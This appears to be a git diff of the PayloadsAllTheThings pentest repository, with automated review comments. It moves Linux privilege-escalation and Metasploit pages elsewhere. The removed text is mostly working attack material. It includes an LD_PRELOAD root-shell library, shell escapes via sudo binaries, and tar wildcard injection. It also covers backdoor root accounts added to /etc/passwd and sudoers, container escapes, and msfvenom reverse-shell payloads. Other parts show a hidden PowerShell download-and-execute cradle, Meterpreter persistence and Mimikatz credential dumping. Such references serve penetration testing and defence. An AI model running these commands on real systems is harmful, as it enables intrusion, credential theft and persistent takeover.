#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/sh");
}
```
Execute any binary with the LD_PRELOAD to spawn a shell : `sudo LD_PRELOAD=/tmp/shell.so find`
### Doas
There are some alternatives to the `sudo` binary such as `doas` for OpenBSD, remember to check its configuration at `/etc/doas.conf`
```bash
permit nopass demo as root cmd vim
```
### sudo_inject
Using [https://github.com/nongiach/sudo_inject](https://github.com/nongiach/sudo_inject)
```powershell
$ sudo whatever
[sudo] password for user:
# Press <ctrl>+c since you don't have the password.
# This creates an invalid sudo tokens.
$ sh exploit.sh
.... wait 1 seconds
$ sudo -i # no password required :)
# id
uid=0(root) gid=0(root) groups=0(root)
```
Slides of the presentation : [https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf](https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf)
## GTFOBins
[GTFOBins](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.
The project collects legitimate functions of Unix binaries that can be abused to break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks.
> gdb -nx -ex '!sh' -ex quit
> sudo mysql -e '\! /bin/sh'
> strace -o /dev/null /bin/sh
> sudo awk 'BEGIN {system("/bin/sh")}'
## Wildcard
By using tar with checkpoint-action options, a specified action can be used after a checkpoint. This action could be a malicious shell script that could be used for executing arbitrary commands under the user who starts tar. “Tricking” root to use the specific options is quite easy, and that's where the wildcard comes in handy.
```powershell
# create file for exploitation
touch -- "--checkpoint=1"
touch -- "--checkpoint-action=exec=sh shell.sh"
echo "#\!/bin/bash\ncat /etc/passwd > /tmp/flag\nchmod 777 /tmp/flag" > shell.sh
# vulnerable script
tar cf archive.tar *
```
Tool: [wildpwn](https://github.com/localh0t/wildpwn)
## Writable files
List world writable files on the system.
```powershell
find / -writable ! -user \`whoami\` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
find / -perm -2 -type f 2>/dev/null
find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
```
### Writable /etc/passwd
First generate a password with one of the following commands.
```powershell
openssl passwd -1 -salt hacker hacker
mkpasswd -m SHA-512 hacker
python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")'
```
Then add the user `hacker` and add the generated password.
```powershell
hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash
```
E.g: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash`
You can now use the `su` command with `hacker:hacker`
Alternatively you can use the following lines to add a dummy user without a password.
WARNING: you might degrade the current security of the machine.
```powershell
echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd
su - dummy
```
NOTE: In BSD platforms `/etc/passwd` is located at `/etc/pwd.db` and `/etc/master.passwd`, also the `/etc/shadow` is renamed to `/etc/spwd.db`.
### Writable /etc/sudoers
```powershell
echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers
# use SUDO without password
echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers
```
## NFS Root Squashing
When **no_root_squash** appears in `/etc/exports`, the folder is shareable and a remote user can mount it
```powershell
# create dir
mkdir /tmp/nfsdir
# mount directory
mount -t nfs 10.10.10.10:/shared /tmp/nfsdir
cd /tmp/nfsdir
# copy wanted shell
cp /bin/bash .
# set suid permission
chmod +s bash
```
## Shared Library
### ldconfig
Identify shared libraries with `ldd`
```powershell
$ ldd /opt/binary
linux-vdso.so.1 (0x00007ffe961cd000)
vulnlib.so.8 => /usr/lib/vulnlib.so.8 (0x00007fa55e55a000)
/lib64/ld-linux-x86-64.so.2 => /usr/lib64/ld-linux-x86-64.so.2 (0x00007fa55e6c8000)
```
Create a library in `/tmp` and activate the path.
```powershell
gcc Wall fPIC shared o vulnlib.so /tmp/vulnlib.c
echo "/tmp/" > /etc/ld.so.conf.d/exploit.conf && ldconfig -l /tmp/vulnlib.so
/opt/binary
```
### RPATH
```powershell
level15@nebula:/home/flag15$ readelf -d flag15 | egrep "NEEDED|RPATH"
0x00000001 (NEEDED) Shared library: [libc.so.6]
0x0000000f (RPATH) Library rpath: [/var/tmp/flag15]
level15@nebula:/home/flag15$ ldd ./flag15
linux-gate.so.1 => (0x0068c000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x00110000)
/lib/ld-linux.so.2 (0x005bb000)
```
By copying the lib into `/var/tmp/flag15/` it will be used by the program in this place as specified in the `RPATH` variable.
```powershell
level15@nebula:/home/flag15$ cp /lib/i386-linux-gnu/libc.so.6 /var/tmp/flag15/
level15@nebula:/home/flag15$ ldd ./flag15
linux-gate.so.1 => (0x005b0000)
libc.so.6 => /var/tmp/flag15/libc.so.6 (0x00110000)
/lib/ld-linux.so.2 (0x00737000)
```
Then create an evil library in `/var/tmp` with `gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6`
```powershell
#include<stdlib.h>
#define SHELL "/bin/sh"
int __libc_start_main(int (*main) (int, char **, char **), int argc, char ** ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end))
{
char *file = SHELL;
char *argv[] = {SHELL,0};
setresuid(geteuid(),geteuid(), geteuid());
execve(file,argv,0);
}
```
## Groups
### Docker
Mount the filesystem in a bash container, allowing you to edit the `/etc/passwd` as root, then add a backdoor account `toor:password`.
```bash
$> docker run -it --rm -v $PWD:/mnt bash
$> echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd
```
Almost similar but you will also see all processes running on the host and be connected to the same NICs.
```powershell
docker run --rm -it --pid=host --net=host --privileged -v /:/host ubuntu bash
```
Or use the following docker image from [chrisfosterelli](https://hub.docker.com/r/chrisfosterelli/rootplease/) to spawn a root shell
```powershell
$ docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
latest: Pulling from chrisfosterelli/rootplease
2de59b831a23: Pull complete
354c3661655e: Pull complete
91930878a2d7: Pull complete
a3ed95caeb02: Pull complete
489b110c54dc: Pull complete
Digest: sha256:07f8453356eb965731dd400e056504084f25705921df25e78b68ce3908ce52c0
Status: Downloaded newer image for chrisfosterelli/rootplease:latest
You should now have a root shell on the host OS
Press Ctrl-D to exit the docker instance / shell
sh-5.0# id
uid=0(root) gid=0(root) groups=0(root)
```
### LXC/LXD
The privesc requires to run a container with elevated privileges and mount the host filesystem inside.
```powershell
swissky@lab ~
$ id
uid=1000(swissky) gid=1000(swissky) groupes=1000(swissky),3(sys),90(network),98(power),110(lxd),991(lp),998(wheel)
```
Build an Alpine image and start it using the flag `security.privileged=true`, forcing the container to interact as root with the host filesystem.
```powershell
# build a simple alpine image
git clone https://github.com/saghul/lxd-alpine-builder
./build-alpine -a i686
# import the image
lxc image import ./alpine.tar.gz --alias myimage
# run the image
lxc init myimage mycontainer -c security.privileged=true
# mount the /root into the image
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
# interact with the container
lxc start mycontainer
lxc exec mycontainer /bin/sh
```
Alternatively https://github.com/initstring/lxd_root
## Kernel Exploits
Precompiled exploits can be found inside these repositories, run them at your own risk !
* [bin-sploits - @offensive-security](https://github.com/offensive-security/exploitdb-bin-sploits/tree/master/bin-sploits)
* [kernel-exploits - @lucyoa](https://github.com/lucyoa/kernel-exploits/)
The following exploits are known to work well.
### CVE-2016-5195 (DirtyCow)
Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
```powershell
# make dirtycow stable
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
https://github.com/evait-security/ClickNRoot/blob/master/1/exploit.c
```
### CVE-2010-3904 (RDS)
Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8
```powershell
https://www.exploit-db.com/exploits/15285/
```
### CVE-2010-4258 (Full Nelson)
Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04)
```powershell
https://www.exploit-db.com/exploits/15704/
```
### CVE-2012-0056 (Mempodipper)
Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)
```powershell
https://www.exploit-db.com/exploits/18411
```
## References
- [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/)
- [Privilege escalation via Docker - April 22, 2015 - Chris Foster](https://fosterelli.co/privilege-escalation-via-docker.html)
- [An Interesting Privilege Escalation vector (getcap/setcap) - NXNJZ - AUGUST 21, 2018](https://nxnjz.net/2018/08/an-interesting-privilege-escalation-vector-getcap/)
- [Exploiting wildcards on Linux - Berislav Kucan](https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/)
- [Code Execution With Tar Command - p4pentest](http://p4pentest.in/2016/10/19/code-execution-with-tar-command/)
- [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic](http://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt)
- [HOW TO EXPLOIT WEAK NFS PERMISSIONS THROUGH PRIVILEGE ESCALATION? - APRIL 25, 2018](https://www.securitynewspaper.com/2018/04/25/use-weak-nfs-permissions-escalate-linux-privileges/)
- [Privilege Escalation via lxd - @reboare](https://reboare.github.io/lxd/lxd-escape.html)
- [Editing /etc/passwd File for Privilege Escalation - Raj Chandel - MAY 12, 2018](https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/)
- [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject)
* [Linux Password Security with pam_cracklib - Hal Pomeranz, Deer Run Associates](http://www.deer-run.com/~hal/sysadmin/pam_cracklib.html)
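Review bot: the new-side notice at the top of this hunk has a copy-paste mismatch: the link text reads `InternalAllTheThings/redteam/persistence/linux-persistence` while the URL points at `.../redteam/escalation/linux-privilege-escalation/`; the text should name the privilege-escalation page. Two defects in the removed content are also worth checking in the moved copy before this hunk lands: under "Create a SUID binary" the `print '...' > /tmp/suid.c` line uses `print` where `printf` is meant, and under "ldconfig" the line `gcc Wall fPIC shared o vulnlib.so /tmp/vulnlib.c` has lost the leading dash on every flag (`-Wall -fPIC -shared -o`). The old Summary also carried broken anchors (`#ld-preload-and-passwd`, `#[CVE-2010-3904-rds`) that the new absolute links correctly replace.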


@@ -0,0 +1,61 @@
# MSSQL Server
:warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/mssql-server-cheatsheet](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/)
* [Tools](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#tools)
* [Identify Instances and Databases](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#identifiy-instaces-and-databases)
* [Discover Local SQL Server Instances](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#discover-local-sql-server-instances)
* [Discover Domain SQL Server Instances](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#discover-domain-sql-server-instances)
* [Discover Remote SQL Server Instances](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#discover-remote-sql-instances)
* [Identify Encrypted databases](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#identifiy-encrypted-databases)
* [Version Query](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#version-query)
* [Identify Sensitive Information](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#identify-sensitive-information)
* [Get Tables from a Specific Database](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#get-tables-from-specific-databases)
* [Gather 5 Entries from Each Column](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#gather-5-entries-from-each-column)
* [Gather 5 Entries from a Specific Table](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#gather-5-entries-from-a-specific-table)
* [Dump common information from server to files](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#dump-common-information-from-server-to-files)
* [Linked Database](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#linked-database)
* [Find Trusted Link](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#find-trusted-link)
* [Execute Query Through The Link](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#execute-query-through-the-link)
* [Crawl Links for Instances in the Domain](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#crawl-links-for-instances-in-the-domain)
* [Crawl Links for a Specific Instance](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#crawl-links-for-a-specific-instance)
* [Query Version of Linked Database](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#query-version-of-linked-database)
* [Execute Procedure on Linked Database](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#execute-procedure-on-linked-database)
* [Determine Names of Linked Databases ](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#determine-names-of-linked-databases)
* [Determine All the Tables Names from a Selected Linked Database](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#determine-all-the-tables-names-from-a-selected-linked-database)
* [Gather the Top 5 Columns from a Selected Linked Table](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#gather-the-top-5-columns-from-a-selected-linked-table)
* [Gather Entries from a Selected Linked Column](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#gather-entries-from-a-selected-linked-column)
* [Command Execution via xp_cmdshell](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#command-execution-via-xp_cmdshell)
* [Extended Stored Procedure](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#extended-stored-procedure)
* [Add the extended stored procedure and list extended stored procedures](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#add-the-extended-stored-procedure-and-list-extended-stored-procedures)
* [CLR Assemblies](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#clr-assemblies)
* [Execute commands using CLR assembly](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#execute-commands-using-clr-assembly)
* [Manually creating a CLR DLL and importing it](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#manually-creating-a-clr-dll-and-importing-it)
* [OLE Automation](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#ole-automation)
* [Execute commands using OLE automation procedures](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#execute-commands-using-ole-automation-procedures)
* [Agent Jobs](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#agent-jobs)
* [Execute commands through SQL Agent Job service](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#execute-commands-through-sql-agent-job-service)
* [List All Jobs](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#list-all-jobs)
* [External Scripts](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#external-scripts)
* [Python](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#python)
* [R](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#r)
* [Audit Checks](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#audit-checks)
* [Find and exploit impersonation opportunities](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#find-and-exploit-impersonation-opportunities)
* [Find databases that have been configured as trustworthy](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#find-databases-that-have-been-configured-as-trustworthy)
* [Manual SQL Server Queries](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#manual-sql-server-queries)
* [Query Current User & determine if the user is a sysadmin](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#query-current-user--determine-if-the-user-is-a-sysadmin)
* [Current Role](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#current-role)
* [Current DB](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#current-db)
* [List all tables](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#list-all-tables)
* [List all databases](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#list-all-databases)
* [All Logins on Server](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#all-logins-on-server)
* [All Database Users for a Database](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#all-database-users-for-a-database)
* [List All Sysadmins](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#list-all-sysadmins)
* [List All Database Roles](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#list-all-database-role)
* [Effective Permissions from the Server](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#effective-permissions-from-the-server)
* [Effective Permissions from the Database](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#effective-permissions-from-the-database)
* [Find SQL Server Logins Which can be Impersonated for the Current Database](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#find-sql-server-logins-which-can-be-impersonated-for-the-current-database)
* [Exploiting Impersonation](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#exploiting-impersonation)
* [Exploiting Nested Impersonation](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#exploiting-nested-impersonation)
* [MSSQL Accounts and Hashes](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#mssql-accounts-and-hashes)
* [References](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#references)
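Review bot: the fragment on the `List All Database Roles` entry does not match its link text: `* [List All Database Roles](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#list-all-database-role)` points at the singular `#list-all-database-role` while every other entry in this summary mirrors its heading text exactly. Either the destination heading really reads "List All Database Role" or this link will land at the top of the page instead of the section; please check the rendered InternalAllTheThings page and make the two agree.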


@@ -1,222 +1,23 @@
# Metasploit # Metasploit
## Summary :warning: Content of this page has been moved to [InternalAllTheThings/command-control/metasploit](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/)
* [Installation](#installation) * [Installation](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#installation)
* [Sessions](#sessions) * [Sessions](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#sessions)
* [Background handler](#background-handler) * [Background handler](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#background-handler)
* [Meterpreter - Basic](#meterpreter---basic) * [Meterpreter - Basic](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#meterpreter---basic)
* [Generate a meterpreter](#generate-a-meterpreter) * [Generate a meterpreter](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#generate-a-meterpreter)
* [Meterpreter Webdelivery](#meterpreter-webdelivery) * [Meterpreter Webdelivery](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#meterpreter-webdelivery)
* [Get System](#get-system) * [Get System](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#get-system)
* [Persistence Startup](#persistence-startup) * [Persistence Startup](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#persistence-startup)
* [Portforward](#portforward) * [Network Monitoring](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#network-monitoring)
* [Upload / Download](#upload---download) * [Portforward](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#portforward)
* [Execute from Memory](#execute-from-memory) * [Upload / Download](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#upload---download)
* [Mimikatz](#mimikatz) * [Execute from Memory](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#execute-from-memory)
* [Pass the Hash - PSExec](#pass-the-hash---psexec) * [Mimikatz](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#mimikatz)
* [Scripting Metasploit](#scripting-metasploit) * [Pass the Hash - PSExec](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#pass-the-hash---psexec)
* [Multiple transports](#multiple-transports) * [Use SOCKS Proxy](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#use-socks-proxy)
* [Best of - Exploits](#best-of---exploits) * [Scripting Metasploit](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#scripting-metasploit)
* [References](#references) * [Multiple transports](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#multiple-transports)
* [Best of - Exploits](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#best-of---exploits)
## Installation * [References](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#references)
```powershell
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
```
or docker
```powershell
sudo docker run --rm -it -p 443:443 -v ~/.msf4:/root/.msf4 -v /tmp/msf:/tmp/data remnux/metasploit
```
## Sessions
```powershell
CTRL+Z -> Session in Background
sessions -> List sessions
sessions -i session_number -> Interact with Session with id
sessions -u session_number -> Upgrade session to a meterpreter
sessions -u session_number LPORT=4444 PAYLOAD_OVERRIDE=meterpreter/reverse_tcp HANDLER=false-> Upgrade session to a meterpreter
sessions -c cmd -> Execute a command on several sessions
sessions -i 10-20 -c "id" -> Execute a command on several sessions
```
## Background handler
ExitOnSession : the handler will not exit if the meterpreter dies.
```powershell
screen -dRR
sudo msfconsole
use exploit/multi/handler
set PAYLOAD generic/shell_reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
set ExitOnSession false
generate -o /tmp/meterpreter.exe -f exe
to_handler
[ctrl+a] + [d]
```
## Meterpreter - Basic
### Generate a meterpreter
```powershell
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f elf > shell.elf
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f exe > shell.exe
$ msfvenom -p osx/x86/shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f macho > shell.macho
$ msfvenom -p php/meterpreter_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw > shell.php; cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f asp > shell.asp
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw > shell.jsp
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f war > shell.war
$ msfvenom -p cmd/unix/reverse_python LHOST="10.10.10.110" LPORT=4242 -f raw > shell.py
$ msfvenom -p cmd/unix/reverse_bash LHOST="10.10.10.110" LPORT=4242 -f raw > shell.sh
$ msfvenom -p cmd/unix/reverse_perl LHOST="10.10.10.110" LPORT=4242 -f raw > shell.pl
```
### Meterpreter Webdelivery
Set up a Powershell web delivery listening on port 8080.
```powershell
use exploit/multi/script/web_delivery
set TARGET 2
set payload windows/x64/meterpreter/reverse_http
set LHOST 10.0.0.1
set LPORT 4444
run
```
```powershell
powershell.exe -nop -w hidden -c $g=new-object net.webclient;$g.proxy=[Net.WebRequest]::GetSystemWebProxy();$g.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $g.downloadstring('http://10.0.0.1:8080/rYDPPB');
```
### Get System
```powershell
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
### Persistence Startup
```powershell
OPTIONS:
-A Automatically start a matching exploit/multi/handler to connect to the agent
-L <opt> Location in target host to write payload to, if none %TEMP% will be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval in seconds between each connection attempt
-p <opt> The port on which the system running Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect back
meterpreter > run persistence -U -p 4242
```
### Portforward
```powershell
portfwd add -l 7777 -r 172.17.0.2 -p 3006
```
### Upload / Download
```powershell
upload /path/in/hdd/payload.exe exploit.exe
download /path/in/victim
```
### Execute from Memory
```powershell
execute -H -i -c -m -d calc.exe -f /root/wce.exe -a -w
```
### Mimikatz
```powershell
load mimikatz
mimikatz_command -f version
mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::wdigest
mimikatz_command -f sekurlsa::searchPasswords
mimikatz_command -f sekurlsa::logonPasswords full
```
```powershell
load kiwi
creds_all
golden_ticket_create -d <domainname> -k <nthashof krbtgt> -s <SID without le RID> -u <user_for_the_ticket> -t <location_to_store_tck>
```
### Pass the Hash - PSExec
```powershell
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > exploit
SMBDomain WORKGROUP no The Windows domain to use for authentication
SMBPass 598ddce2660d3193aad3b435b51404ee:2d20d252a479f485cdf5e171d93985bf no The password for the specified username
SMBUser Lambda no The username to authenticate as
```
## Scripting Metasploit
Using a `.rc file`, write the commands to execute, then run `msfconsole -r ./file.rc`.
Here is a simple example to script the deployment of a handler an create an Office doc with macro.
```powershell
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 0.0.0.0
set LPORT 4646
set ExitOnSession false
exploit -j -z
use exploit/multi/fileformat/office_word_macro
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 10.10.14.22
set LPORT 4646
exploit
```
## Multiple transports
```powershell
msfvenom -p windows/meterpreter_reverse_tcp lhost=<host> lport=<port> sessionretrytotal=30 sessionretrywait=10 extensions=stdapi,priv,powershell extinit=powershell,/home/ionize/AddTransports.ps1 -f exe
```
Then, in AddTransports.ps1
```powershell
Add-TcpTransport -lhost <host> -lport <port> -RetryWait 10 -RetryTotal 30
Add-WebTransport -Url http(s)://<host>:<port>/<luri> -RetryWait 10 -RetryTotal 30
```
## Best of - Exploits
* MS17-10 Eternal Blue - `exploit/windows/smb/ms17_010_eternalblue`
* MS08_67 - `exploit/windows/smb/ms08_067_netapi`
## References
* [Multiple transports in a meterpreter payload - ionize](https://ionize.com.au/multiple-transports-in-a-meterpreter-payload/)
* [Creating Metasploit Payloads - Peleus](https://netsec.ws/?p=331)
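Review bot: the Metasploit body being removed here carries a few errors that should not be copied over unchanged to the destination page: `* MS17-10 Eternal Blue - `exploit/windows/smb/ms17_010_eternalblue`` should read MS17-010, `Here is a simple example to script the deployment of a handler an create an Office doc with macro.` should say "and create", and the sentence `ExitOnSession : the handler will not exit if the meterpreter dies.` describes the option the wrong way round, since `ExitOnSession` on `exploit/multi/handler` controls whether the handler returns once a session has been created, so `set ExitOnSession false` keeps it listening after the first session opens. Since this commit is the moment the text is moved, it is the cheapest place to fix these rather than carrying them into the new repository.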


@@ -1,294 +1,17 @@
# Bug Hunting Methodology and Enumeration # Bug Hunting Methodology and Enumeration
:warning: Content of this page has been moved to [InternalAllTheThings/methodology/bug-hunting-methodology](https://swisskyrepo.github.io/InternalAllTheThings/methodology/bug-hunting-methodology/)
## Summary ## Summary
* [Passive Recon](#passive-recon) * [Passive Recon](https://swisskyrepo.github.io/InternalAllTheThings/methodology/bug-hunting-methodology/#passive-recon)
* Shodan * Shodan
* Wayback Machine * Wayback Machine
* The Harvester * The Harvester
* Github OSINT
* [Active Recon](#active-recon) * [Active Recon](https://swisskyrepo.github.io/InternalAllTheThings/methodology/bug-hunting-methodology/#active-recon)
* Masscan * [Network discovery](https://swisskyrepo.github.io/InternalAllTheThings/methodology/bug-hunting-methodology/#network-discovery)
* Nmap * [Web discovery](https://swisskyrepo.github.io/InternalAllTheThings/methodology/bug-hunting-methodology/#web-discovery)
* Nmap Script
* RPCClient
* Enum4all
* [List all the subdirectories and files](#list-all-the-subdirectories-and-files) * [Web Vulnerabilities](https://swisskyrepo.github.io/InternalAllTheThings/methodology/bug-hunting-methodology/#looking-for-web-vulnerabilities)
* Gobuster
* Backup File Artifacts Checker
* [Web Vulnerabilities](#looking-for-web-vulnerabilities)
* Repository Github
* Burp
* Web Checklist
* Nikto
* Payment functionality
## Passive recon
* Using Shodan (https://www.shodan.io/) to detect similar app
```bash
can be integrated with nmap (https://github.com/glennzw/shodan-hq-nse)
